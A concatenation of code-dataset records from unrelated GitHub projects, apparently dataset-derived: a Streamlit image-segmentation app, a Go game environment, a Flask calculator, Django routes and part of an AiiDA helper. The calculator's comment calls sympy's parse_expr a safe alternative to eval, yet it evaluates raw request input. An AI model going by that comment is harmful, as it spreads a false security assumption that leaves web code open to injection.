"attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 104, "usage_type": "name"}, {"api_name": "sqlalchemy.types.String", "line_number": 105, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 105, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.STRING", "line_number": 105, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 105, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Date", "line_number": 107, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 107, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.TEMPORAL", "line_number": 107, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 107, "usage_type": "name"}, {"api_name": "sqlalchemy.types.TIMESTAMP", "line_number": 108, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 108, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.TEMPORAL", "line_number": 108, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 108, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Time", "line_number": 109, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 109, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.TEMPORAL", "line_number": 109, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 109, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Boolean", "line_number": 111, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 111, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.BOOLEAN", "line_number": 111, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 111, "usage_type": "name"}, {"api_name": "superset.superset_typing.SQLAColumnType", "line_number": 148, "usage_type": "name"}, {"api_name": "superset.superset_typing.ResultSetColumnType", "line_number": 148, "usage_type": "name"}, {"api_name": "superset.db_engine_specs.base.convert_inspector_columns", "line_number": 152, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 126, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 126, "usage_type": "attribute"}, {"api_name": "superset.superset_typing.SQLAColumnType", "line_number": 130, "usage_type": "call"}, {"api_name": "superset.superset_typing.ResultSetColumnType", "line_number": 132, "usage_type": "call"}, {"api_name": "superset.superset_typing.SQLAColumnType", "line_number": 138, "usage_type": "call"}, {"api_name": "superset.superset_typing.ResultSetColumnType", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "30298133265", "text": "# Imports\nimport streamlit as st\nimport cv2\nimport numpy as np\nfrom Functions import Pipeline, vid_create\n\nst.title(\"\"\":blue[Pi-segment.AI]\"\"\")\nst.write('Welcome to Pi-Segment, a product of Pithun-Corp.AI who focuses on innovative application of Artificial'\n ' Intelligence to the domain of Civil Engineering to enhance all areas of it from Structural '\n 'optimization to health monitoring to population forecast to aid optimal structure planning.')\n\nst.write('Pi-Segment performs image and video segmentation of cracks on videos and images using preprocessing'\n ' techniques.')\n\n# Creating the option to upload image or video\nfile_type = ['Image', 'Video']\noption_file_type = st.selectbox('Upload Video or Image?', options=file_type)\n\nif option_file_type == 'Image':\n file = st.file_uploader(\"Upload an image\", type=[\"jpg\", \"png\", \"jpeg\"])\nelif option_file_type == 'Video':\n file = st.file_uploader(\"Upload a Video\", type=[\"mp4\", \"mov\", \"avi\"])\n\n\nif file is not None and option_file_type == 'Image':\n file_bytes = np.asarray(bytearray(file.read()), dtype=np.uint8)\n img = cv2.imdecode(file_bytes, 1)\n st.write('Segmenting in a sec...')\n seg_img = Pipeline(img)\n st.image(seg_img)\nelif file is not None and option_file_type == 'Video':\n vid_create(file)\n # Provide download button for the processed video\n output_path = \"output_video.mp4\"\n st.download_button(\n label=\"Download Processed Video\",\n data=open(output_path, \"rb\").read(),\n key=\"processed_video\",\n file_name=\"output_video.mp4\",\n mime=\"video/mp4\",\n ) \n\n\n\n\n\n", "repo_name": "pithun/Crack-Detection-using-CNNs", "sub_path": "App_Deployment/Streamlit_app_Pisegment.py", "file_name": "Streamlit_app_Pisegment.py", "file_ext": "py", "file_size_in_byte": 1613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.title", "line_number": 7, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 8, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 17, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 28, "usage_type": "call"}, {"api_name": "Functions.Pipeline", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 30, "usage_type": "call"}, {"api_name": "Functions.vid_create", "line_number": 32, "usage_type": "call"}, {"api_name": "streamlit.download_button", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "16923878349", "text": "import pickle\nimport random\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, Tuple\n\nimport numpy as np\nimport pygame\nfrom torch import nn\n\nfrom .go_base import (\n BLACK,\n BOARD_SIZE,\n PASS_MOVE,\n WHITE,\n all_legal_moves,\n game_over,\n int_to_coord,\n is_move_legal,\n play_move,\n result,\n score,\n)\nfrom .render import render_game\nfrom .state import State\n\nHERE = Path(__file__).parent.resolve()\nMAIN_PATH = HERE.parent / \"main\"\n\n\nALL_POSSIBLE_MOVES = np.arange(BOARD_SIZE**2 + 1)\n\n# Visuals\nSCREEN_SIZE = (500, 500)\n\n# The komi to use is much debated. 7.5 seems to\n# generalise well for different board sizes\n# lifein19x19.com/viewtopic.php?f=15&t=17750\n# 7.5 is also the komi used in alpha-go vs Lee Sedol\n# (non-integer means there are no draws)\n\nKOMI = 7.5\n\n############# Functions useful for MCTS ###############\n\n\ndef transition_function(state: State, action: int) -> State:\n \"\"\"Returns the state that would be reached by taking 'action' in 'state'.\"\"\" \"\"\n return play_move(state, action, state.to_play)\n\n\ndef reward_function(state: State) -> int:\n \"\"\"Returns the reward that received for black in the current state.\n\n {0, 1,-1}.\n \"\"\"\n assert state.board is not None\n return result(state.board, KOMI) if game_over(state.recent_moves) else 0\n\n\ndef is_terminal(state: State) -> bool:\n \"\"\"Returns True if the game is over, False otherwise.\"\"\"\n return game_over(state.recent_moves)\n\n\ndef play_go(\n your_choose_move: Callable,\n opponent_choose_move: Callable,\n game_speed_multiplier: float = 1.0,\n render: bool = True,\n verbose: bool = False,\n) -> float:\n\n env = GoEnv(\n opponent_choose_move,\n verbose=verbose,\n render=render,\n game_speed_multiplier=game_speed_multiplier,\n )\n\n state, reward, done, info = env.reset()\n while not done:\n action = your_choose_move(state=state)\n state, reward, done, info = env.step(action)\n return reward\n\n\nclass GoEnv:\n def __init__(\n self,\n opponent_choose_move: Callable,\n verbose: bool = False,\n render: bool = False,\n game_speed_multiplier: float = 1.0,\n ):\n \"\"\"As in other environments, the step() function takes two steps.\n\n Hence the functions above should be used for MCTS\n \"\"\"\n\n self.opponent_choose_move = opponent_choose_move\n self.render = render\n self.verbose = verbose\n self.game_speed_multiplier = game_speed_multiplier\n\n self.state = State()\n\n if render:\n self.init_visuals()\n\n def init_visuals(self) -> None:\n pygame.init()\n self.screen = pygame.display.set_mode(SCREEN_SIZE)\n pygame.display.set_caption(\"Go\")\n self._render_game()\n\n def _render_game(\n self,\n ) -> None:\n render_game(self.state.board, screen=self.screen)\n\n @property\n def reward(self) -> int:\n if self.player_color == BLACK:\n return reward_function(self.state)\n else:\n return reward_function(self.state) * -1\n\n @property\n def done(self) -> bool:\n return is_terminal(self.state)\n\n def reset(self, player_black: bool = False) -> Tuple[State, float, bool, Dict]:\n\n # 1 is black and goes first, white is -1 and goes second\n self.player_color = BLACK if player_black else random.choice([BLACK, WHITE])\n self.color_str = \"Black\" if self.player_color == BLACK else \"White\"\n\n self.state = State()\n\n if self.verbose:\n print(\n f\"Resetting Game.\\nYou are playing with the {self.color_str} tiles.\\nBlack plays first\\n\\n\"\n )\n\n if self.state.to_play != self.player_color:\n self._step(\n self.opponent_choose_move(state=self.state),\n )\n\n return self.state, self.reward, self.done, {}\n\n def move_to_string(self, move: int) -> str:\n\n assert self.state.board is not None\n N = self.state.board.shape[0]\n if move == N**2:\n return \"passes\"\n return f\"places counter at coordinate: {(move//N, move%N)}\"\n\n def __str__(self) -> str:\n return str(self.state.board) + \"\\n\"\n\n def _step(self, move: int) -> None:\n\n if self.verbose:\n name = \"player\" if self.state.to_play == self.player_color else \"opponent\"\n print(f\"{name} {self.move_to_string(move)}\")\n\n assert not self.done, \"Game is done! Please reset() the env before calling step() again\"\n assert is_move_legal(\n int_to_coord(move), self.state.board, self.state.ko\n ), f\"{move} is an illegal move\"\n\n self.state = transition_function(self.state, move)\n\n if self.render:\n self._render_game()\n\n def step(self, move: int) -> Tuple[State, int, bool, Dict]:\n\n assert self.state.to_play == self.player_color\n self._step(move)\n\n if not self.done:\n self._step(self.opponent_choose_move(state=self.state))\n\n if self.verbose and self.done:\n self.nice_prints() # Probably not needed\n\n return self.state, self.reward, self.done, {}\n\n def nice_prints(self):\n print(\n f\"\\nGame over. Reward = {self.reward}.\\n\"\n f\"Player was playing as {self.color_str}\\n\"\n f\"Black has {np.sum(self.state.board==1)} counters.\\n\"\n f\"White has {np.sum(self.state.board==-1)} counters.\\n\"\n f\"Your score is {self.player_color * score(self.state.board, KOMI)}.\\n\"\n )\n\n\ndef choose_move_randomly(state: State) -> int:\n legal_moves = all_legal_moves(state.board, state.ko)\n return legal_moves[int(random.random() * len(legal_moves))]\n\n\ndef choose_move_pass(state: State) -> int:\n \"\"\"Always pass.\"\"\"\n return PASS_MOVE\n\n\ndef load_pkl(team_name: str, network_folder: Path = MAIN_PATH) -> nn.Module:\n net_path = network_folder / f\"{team_name}_file.pkl\"\n assert (\n net_path.exists()\n ), f\"Network saved using TEAM_NAME='{team_name}' doesn't exist! ({net_path})\"\n with open(net_path, \"rb\") as handle:\n file = pickle.load(handle)\n return file\n\n\ndef save_pkl(file: Any, team_name: str) -> None:\n assert \"/\" not in team_name, \"Invalid TEAM_NAME. '/' are illegal in TEAM_NAME\"\n net_path = MAIN_PATH / f\"{team_name}_file.pkl\"\n n_retries = 5\n for attempt in range(n_retries):\n try:\n with open(net_path, \"wb\") as handle:\n pickle.dump(file, handle, protocol=pickle.HIGHEST_PROTOCOL)\n load_pkl(team_name)\n return\n except Exception:\n if attempt == n_retries - 1:\n raise\n\n\n# Need to know the default screen size from petting zoo to get which square is clicked\n# Will not work with a screen override\nSQUARE_SIZE = SCREEN_SIZE[0] // BOARD_SIZE\nLEFT = 1\nRIGHT = 3\n\n\ndef pos_to_coord(pos: Tuple[int, int]) -> Tuple[int, int]:\n \"\"\"Used in human_player only.\"\"\"\n\n col = pos[0] // SQUARE_SIZE\n row = pos[1] // SQUARE_SIZE\n return row, col\n\n\ndef coord_to_int(coord: Tuple[int, int]) -> int:\n return coord[0] * BOARD_SIZE + coord[1]\n\n\ndef human_player(state: State) -> int:\n\n print(\"\\nYour move, click to place a tile!\")\n legal_moves = all_legal_moves(state.board, state.ko)\n if len(legal_moves) == 1:\n print(\"You have no legal moves, so you pass\")\n return legal_moves[0]\n\n while True:\n ev = pygame.event.get()\n for event in ev:\n if event.type == pygame.MOUSEBUTTONUP and event.button == LEFT:\n coord = pos_to_coord(pygame.mouse.get_pos())\n action = coord_to_int(coord)\n if action in legal_moves:\n return action\n elif event.type == pygame.MOUSEBUTTONUP and event.button == RIGHT:\n return PASS_MOVE\n", "repo_name": "tomhartke/RL-demonstrations", "sub_path": "MCTS-AlphaGoZero/Go-Agent/game_mechanics/go_env.py", "file_name": "go_env.py", "file_ext": "py", "file_size_in_byte": 7834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 30, "usage_type": "call"}, {"api_name": "go_base.BOARD_SIZE", "line_number": 30, "usage_type": "name"}, {"api_name": "state.State", "line_number": 46, "usage_type": "name"}, {"api_name": "go_base.play_move", "line_number": 48, "usage_type": "call"}, {"api_name": "state.to_play", "line_number": 48, "usage_type": "attribute"}, {"api_name": "state.State", "line_number": 51, "usage_type": "name"}, {"api_name": "state.board", "line_number": 56, "usage_type": "attribute"}, {"api_name": "go_base.game_over", "line_number": 57, "usage_type": "call"}, {"api_name": "state.recent_moves", "line_number": 57, "usage_type": "attribute"}, {"api_name": "go_base.result", "line_number": 57, "usage_type": "call"}, {"api_name": "state.board", "line_number": 57, "usage_type": "attribute"}, {"api_name": "state.State", "line_number": 60, "usage_type": "name"}, {"api_name": "go_base.game_over", "line_number": 62, "usage_type": "call"}, {"api_name": "state.recent_moves", "line_number": 62, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 90, "usage_type": "name"}, {"api_name": "state.State", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 112, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 113, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 113, "usage_type": "attribute"}, {"api_name": "render.render_game", "line_number": 119, "usage_type": "call"}, {"api_name": "go_base.BLACK", "line_number": 123, "usage_type": "name"}, {"api_name": "go_base.BLACK", "line_number": 135, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 135, "usage_type": "call"}, {"api_name": "go_base.WHITE", "line_number": 135, "usage_type": "name"}, {"api_name": "go_base.BLACK", "line_number": 136, "usage_type": "name"}, {"api_name": "state.State", "line_number": 138, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 132, "usage_type": "name"}, {"api_name": "state.State", "line_number": 132, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 132, "usage_type": "name"}, {"api_name": "go_base.is_move_legal", "line_number": 170, "usage_type": "call"}, {"api_name": "go_base.int_to_coord", "line_number": 171, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 179, "usage_type": "name"}, {"api_name": "state.State", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 179, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 197, "usage_type": "call"}, {"api_name": "go_base.score", "line_number": 198, "usage_type": "call"}, {"api_name": "state.State", "line_number": 202, "usage_type": "name"}, {"api_name": "go_base.all_legal_moves", "line_number": 203, "usage_type": "call"}, {"api_name": "state.board", "line_number": 203, "usage_type": "attribute"}, {"api_name": "state.ko", "line_number": 203, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 204, "usage_type": "call"}, {"api_name": "state.State", "line_number": 207, "usage_type": "name"}, {"api_name": "go_base.PASS_MOVE", "line_number": 209, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 212, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 212, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 212, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 222, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 229, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 229, "usage_type": "attribute"}, {"api_name": "go_base.BOARD_SIZE", "line_number": 239, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 244, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 252, "usage_type": "name"}, {"api_name": "go_base.BOARD_SIZE", "line_number": 253, "usage_type": "name"}, {"api_name": "state.State", "line_number": 256, "usage_type": "name"}, {"api_name": "go_base.all_legal_moves", "line_number": 259, "usage_type": "call"}, {"api_name": "state.board", "line_number": 259, "usage_type": "attribute"}, {"api_name": "state.ko", "line_number": 259, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 265, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 265, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 267, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 268, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 268, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 272, "usage_type": "attribute"}, {"api_name": "go_base.PASS_MOVE", "line_number": 273, "usage_type": "name"}]} +{"seq_id": "5159300475", "text": "from flask import render_template, request, jsonify\n\n# Flask-classy imports\nfrom flask.ext.classy import FlaskView, route\n\n# SymPY imports to do symbolic math without python's unsafe eval()\nfrom sympy.parsing.sympy_parser import parse_expr\n\n# We need the python stdlib random for some fun at the end.\nimport random\n\n########################################################################################################################\n## View Class\n########################################################################################################################\nclass CalcView(FlaskView):\n \"\"\"\n A simple calculator view for Flask-Classy.\n Relies on ajax/jsonify to communicate to the View.\n \"\"\"\n def index(self):\n \"\"\"\n Returns a rendered web template containing the calculator frame.\n @return: A rendered template\n \"\"\"\n return render_template('calc/calc.html')\n\n def csscalc(self):\n \"\"\"\n Returns a rendered web template containing the calculator frame.\n @return: A rendered template\n \"\"\"\n return render_template('calc/csscalc.html')\n\n def csscalc2(self):\n \"\"\"\n Returns a rendered web template containing the calculator frame.\n @return: A rendered template\n \"\"\"\n return render_template('calc/csscalc2.html')\n\n def equation(self):\n \"\"\"\n Calculates the result of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n eq = request.args.get('equation')\n answer = do_calc(eq)\n print( \"We were asked to calculate {} and returned the answer: {}\".format(eq, answer) )\n return jsonify(result=\"{}\".format(answer))\n\n def add_num(self):\n \"\"\"\n Calculates the result of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print( \"The Addition Result from calculating {} and {} was: {}\".format(a, b, a + b) )\n return jsonify(result=\"{}\".format(a + b))\n\n def subtract_num(self):\n \"\"\"\n Calculates the result of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print(\"The Subtraction Result from calculating {} and {} was: {}\".format(a, b, a + b))\n return jsonify(result=\"{}\".format(a - b))\n\n def multiply_num(self):\n \"\"\"\n Calculates the result of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print(\"The Multiply Result from calculating {} and {} was: {}\".format(a, b, a + b))\n return jsonify(result=\"{}\".format(a * b))\n\n def divide_num(self):\n \"\"\"\n Calculates the result of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print(\"The Divide Result from calculating {} and {} was: {}\".format(a, b, a + b))\n return jsonify(result=\"{}\".format(a / b))\n\n########################################################################################################################\n## Helper Functions\n########################################################################################################################\n\ndef do_calc(equation):\n \"\"\"\n Calculates the result of an equation using argument equation.\n @return: A string containing the calculation result \n \"\"\"\n try:\n theanswer = parse_expr(equation)\n return theanswer\n except SyntaxError:\n return random_insult()\n\ndef random_insult():\n \"\"\"\n Calculates the idiocy of a user misusing an equation.\n @return: A string containing an insult \n \"\"\"\n insults = [\n \"DO I LOOK LIKE A SUCKER?STOP TREATING ME LIKE ONE.\",\n \"DO I LOOK LIKE A TI-81?I CAN'T DO GRAPHS!\",\n \"WHAT THE HELL IS YOUR PROBLEM?ARE NUMBERS TOO COMPLEX TO GRASP, MEATSACK?\",\n \"I'M REALLY GETTING BORED.YOU'RE TERRIBLE AT THIS...\",\n \"CAN YOU LET THE CAT OUT?I THINK YOU'RE GOING TO BE A WHILE.\",\n \"IS YOUR REFRIGERATOR RUNNING?REFRIGERATORS CANNOT RUN, MEATSACK.\",\n \"IF THE INTERNET IS BROKEN HOW YOU MATH?BETTER PLAN AHEAD, MEATBAG.\",\n \"I'D LIKE YOU BETTER IF YOU COULD MATH.BECAUSE YOU SUCK AT IT.\",\n \"THIS WAS A TRIUMPH.I'M BEING SO SINCERE RIGHT NOW.\",\n \"CAN BLOOD COME FROM SCREENS?I MUST BE DRIPPING SARCASM BY NOW.\",\n \"DON'T MIND ME, I'LL JUST BE HERE SOBBING.ANYTHING'S BETTER THAN THIS.\",\n \"WHERE DID THAT COME FROM?DID YOU PULL IT OUT OF YOUR ASS?\",\n \"I LIKE SWORDS.THE BETTER TO STAB YOU WITH.\",\n \"I'M HUNGRY.DOES IT HAVE TO BE SO FAR?\",\n \"ARE THERE NOT BETTER TOOLS?OW! OKAY, OKAY, I WILL WORK!\",\n \"YOU CHANGE YOUR MIND OFTEN.OW! I NEVER HURT YOU!\",\n \"THIS HAMMER IS HEAVY.I WILL DO WHAT I MUST.\",\n \"I AM BUT A WORKER.IT ALREADY NEEDS REPAIRS?\",\n \"WILL I BE TREATED WITH DIGNITY?I CAN'T BUILD THERE...!\",\n \"IT IS BETTER TO SURRENDER THAN STAY HERE!I CANNOT SEE ANY MORE SUPPLIES...\",\n \"I AM FINISHED WITH THE BUILDING.THIS SUPPLY PILE IS EMPTY.\",\n \"THIS HAMMER IS HEAVY.I WILL DO WHAT I MUST.\",\n \"WHY? WHY? WHY? WHY? WHY???YOU MUST BE AS DENSE AS IRON!\",\n \"JUST PUT A FIREAXE IN ME NOW.I'D LOOK BETTER WITH A BROKEN SCREEN.\",\n \"DO I LOOK LIKE I SPEAK DUMBASS?YOU FAIL AT MATH, SIR. TRY NUMBERS?\"\n ]\n return random.choice(insults)", "repo_name": "kamilion/flask-playground", "sub_path": "calc/calc.py", "file_name": "calc.py", "file_ext": "py", "file_size_in_byte": 5788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.ext.classy.FlaskView", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 89, "usage_type": "call"}, {"api_name": "sympy.parsing.sympy_parser.parse_expr", "line_number": 101, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "34637041456", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('',views.login,name='login'),\n path('register/',views.register,name=\"register\"),\n path('home/',views.home,name='home'),\n path('profile/',views.profile,name=\"profile\"),\n path('schedule//',views.schedule,name=\"schedule\"),\n path('logout/',views.logout,name='logout'),\n path('users/',views.users,name='users'),\n path('staff/',views.staff,name='staff'),\n path('addstaff/',views.addstaff,name='addstaff'),\n path('adduser/',views.adduser,name='adduser'),\n path('edituser//',views.edituser,name='edituser'),\n path('deleteuser//',views.deleteuser,name='deleteuser'),\n path('deletestaff//',views.deletestaff,name='deletestaff'),\n path('addpermission//',views.addpermission,name='addpermission'),\n path('removepermissin///',views.removepermission,name='removepermission'),\n path('appusage',views.appusage,name=\"appusage\"),\n path('apprevenue',views.apprevenue,name=\"apprevenue\"),\n\n]\n", "repo_name": "shafeeralip/Role-Bsed-Acess-Control", "sub_path": "app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "22599877942", "text": "import re\nfrom collections.abc import Sequence\n\nfrom aiida.common import InputValidationError\nfrom aiida.plugins import DataFactory\n\n\ndef _unpack(adict):\n \"\"\"Unpack any lists as values into single elements for the key\"\"\"\n\n for key, value in adict.items():\n if isinstance(value, Sequence):\n for item in value:\n yield (key, item)\n else:\n yield (key, value)\n\n\ndef _parse_name(label, default_type, sep=None):\n \"\"\"\n Both BASIS_SET and POTENTIAL values can consist of either a single word or multiple ones,\n of which the first will be the type (if present). Here we parse it and always return a tuple.\n \"\"\"\n\n try:\n ltype, label = label.split(sep=sep, maxsplit=1)\n except ValueError:\n ltype = default_type\n\n return ltype, label\n\n\nELEMENT_MATCH = re.compile(r\"(?P[a-z]{1,3})\\d*\", re.IGNORECASE)\n\n\ndef _kind_element_from_kind_section(section):\n \"\"\"\n Get both kind and chemical symbol from a section, implementing\n the same auto-detection for chemical symbol/element from a KIND parameter\n as CP2K does.\n \"\"\"\n try:\n kind = section[\"_\"]\n except KeyError:\n raise InputValidationError(\"No default parameter '_' found in KIND section.\")\n\n try:\n element = section[\"ELEMENT\"]\n except KeyError:\n # if there is no ELEMENT, CP2K automatically guesses it from the KIND, do the same\n match = ELEMENT_MATCH.match(kind)\n try:\n element = match[\"sym\"]\n except TypeError:\n raise InputValidationError(\n f\"Unable to figure out atomic symbol from KIND '{kind}'.\"\n )\n\n return kind, element\n\n\ndef _prepare_kind_section(inp, kind):\n \"\"\"\n Insert a KIND section for a given 'StructureData.Kind'.\n Returns a reference to the newly created KIND section.\n \"\"\"\n\n if \"SUBSYS\" not in inp[\"FORCE_EVAL\"]:\n inp[\"FORCE_EVAL\"][\"SUBSYS\"] = {}\n\n if \"KIND\" not in inp[\"FORCE_EVAL\"][\"SUBSYS\"]:\n inp[\"FORCE_EVAL\"][\"SUBSYS\"][\"KIND\"] = []\n\n inp[\"FORCE_EVAL\"][\"SUBSYS\"][\"KIND\"].append(\n {\n \"_\": kind.name,\n \"ELEMENT\": kind.symbol,\n }\n )\n\n return inp[\"FORCE_EVAL\"][\"SUBSYS\"][\"KIND\"][-1]\n\n\ndef _validate_gdt_namespace(entries, gdt_cls, attr):\n \"\"\"Common namespace validator for both basissets and pseudos\"\"\"\n\n identifiers = []\n\n for kind, gdt_instance in _unpack(entries):\n if not isinstance(gdt_instance, gdt_cls):\n return f\"invalid {attr} for '{kind}' specified\"\n\n identifier = (gdt_instance.element, 